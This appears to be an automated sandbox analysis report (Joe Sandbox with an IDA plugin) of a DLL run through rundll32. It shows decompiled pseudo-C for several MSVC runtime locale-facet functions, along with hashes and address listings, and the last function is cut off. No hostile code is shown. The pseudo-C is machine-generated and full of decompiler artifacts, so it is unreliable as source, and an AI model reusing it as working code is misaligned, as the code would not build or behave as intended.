Opcode ID: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
Instruction ID: f1dbadee7f91d3c947d3c483ba98e15bbc5920e0da9bb9bb820dfe588d201991
Opcode Fuzzy Hash: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
Instruction Fuzzy Hash: 4201703615DB2B5FD78405F5AC9DA97376BEB17B7A330833AF014850D8EF528802C190

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20FA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E2114EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E211558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E2115C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6e20fa97
0x6e20fa97
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20fac8
0x6e20facd
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5

APIs

__EH_prolog3.LIBCMT ref: 6E20FA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FAA8
int.LIBCPMT ref: 6E20FABF

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FB37

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
Instruction ID: f404a529c8d1b5821af0a7ab00ac64639aab1fa7b517d80822bcfb7494d569a5
Opcode Fuzzy Hash: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
Instruction Fuzzy Hash: DA11067AA0051E8FCF00DBE0C894AEEB77BBF44B14F244919E4116B2D0DF749A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E6E20FB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E211558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E2115C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6e20fb3d
0x6e20fb3d
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb6e
0x6e20fb73
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b

APIs

__EH_prolog3.LIBCMT ref: 6E20FB44
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FB4E
int.LIBCPMT ref: 6E20FB65

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FBDD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
Instruction ID: 78c16c7cfdeef293c5514b18c1c363ef952ffcb74cea5a6842a6c889fabdd728
Opcode Fuzzy Hash: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
Instruction Fuzzy Hash: 5611067690051E9BCF04DBE4C898AEEB77BAF48B14F240909E511AB2D0DBB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E6E20FBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E2115C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6e20fbe3
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc14
0x6e20fc19
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21

APIs

__EH_prolog3.LIBCMT ref: 6E20FBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FBF4
int.LIBCPMT ref: 6E20FC0B

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FC83

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
Instruction ID: d1e7b642812f5fe2d79606500f628ac9fe5a98729226613b93c8deb2ffc433f1
Opcode Fuzzy Hash: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
Instruction Fuzzy Hash: 9311067590051D9BCF40DBE0C894EEEB77BBF44B14F240909E8106B2D0DFB49A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E21B898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E21C050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
